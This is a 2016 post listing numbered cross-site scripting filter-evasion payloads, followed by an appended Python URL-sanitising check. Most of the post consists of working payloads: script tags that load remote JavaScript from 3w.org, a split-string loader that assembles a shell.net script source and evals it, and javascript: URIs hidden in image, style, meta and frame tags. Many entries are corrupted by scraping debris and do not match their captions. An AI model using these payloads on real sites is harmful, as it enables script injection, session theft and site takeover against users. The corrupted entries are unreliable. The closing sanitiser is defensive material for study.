XSS Attack Summary

Posted on 2016-4-28 10:06:15
(1) Ordinary XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert boxes

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting up the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme XSS example

<IMG SRC=\'#\'" /span>

(16) Working around a character limit (must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, since there is nowhere they can be used

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front of the JavaScript

<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3

<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC=\'#\'" /span>

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image

<INPUT SRC=\'#\'" /span>

(32) BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc

<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND

<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript

<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with link URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame

<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (an open angle bracket followed by a letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

exppression(alert("XSS"))'>

(53) STYLE background

<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS

<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
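
As an added defender-side example (not part of the original post): a Python check for URL-bearing attributes that normalises the value the way a browser does before it reads the scheme, so the case-mixing, control-character and entity-encoding tricks in items (4), (5), (8)-(14) and (17)-(18) above all collapse to a plain "javascript:" and are refused, while relative and http(s) URLs still pass; `attr()` covers the attribute-breakout pattern in (99). The sample inputs and the `ALLOWED_SCHEMES` policy are constructed for this example.

```python
import html
import re

# Added example, not code from the original post: a server-side accept/reject
# check for URL-bearing attributes (SRC, HREF, BACKGROUND, CSS url()). It applies
# the normalisations a browser performs before reading the scheme, so the bypasses
# listed above (mixed case, NUL/tab/CR/LF inside "javascript:", entities with or
# without semicolons) collapse back to the plain scheme name.
ALLOWED_SCHEMES = {"http", "https"}
# C0 controls, space and DEL: browsers ignore tab/LF/CR inside a URL and strip
# leading/trailing controls; dropping all of them is stricter, fine for a check.
_STRIP = re.compile(r"[\x00-\x20\x7f]")

def normalize_url(value: str) -> str:
    """Decode entities (with or without ';'), drop control chars, lower-case."""
    return _STRIP.sub("", html.unescape(value)).lower()

def is_safe_url(value: str) -> bool:
    """Accept relative URLs and allow-listed schemes only."""
    url = normalize_url(value)
    head = re.split(r"[/?#]", url, maxsplit=1)[0]  # text before path/query/hash
    if ":" not in head:
        return True  # relative: /img/a.png, logo.png?v=2, //cdn.example/x.js
    return head.split(":", 1)[0] in ALLOWED_SCHEMES

def attr(value: str) -> str:
    """Escape untrusted text for a double-quoted HTML attribute value."""
    return html.escape(value, quote=True)

# Constructed samples: the first group mirrors the bypass patterns above,
# the second is ordinary input that the check must keep accepting.
MALICIOUS = [
    "javascript:alert('XSS')",
    "JaVaScRiPt:alert('XSS')",
    "java\0script:alert('XSS')",
    "jav\tascript:alert('XSS')",
    "jav\r\nascript:alert('XSS')",
    "jav&#x09;ascript:alert('XSS')",
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert('XSS')",
    "&#0000106&#0000097&#0000118&#0000097&#0000115"
    "&#0000099&#0000114&#0000105&#0000112&#0000116:alert('XSS')",
    "vbscript:msgbox('XSS')",
]
BENIGN = ["https://example.com/logo.png", "/images/logo.png", "logo.png?v=2"]

def rejected(values):
    """Return the values the check would refuse."""
    return [v for v in values if not is_safe_url(v)]
```

The check is only half of the defence: values that pass still go through `attr()` (or the equivalent for the context) when written into the page, because a scheme allow-list says nothing about quotes and angle brackets.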
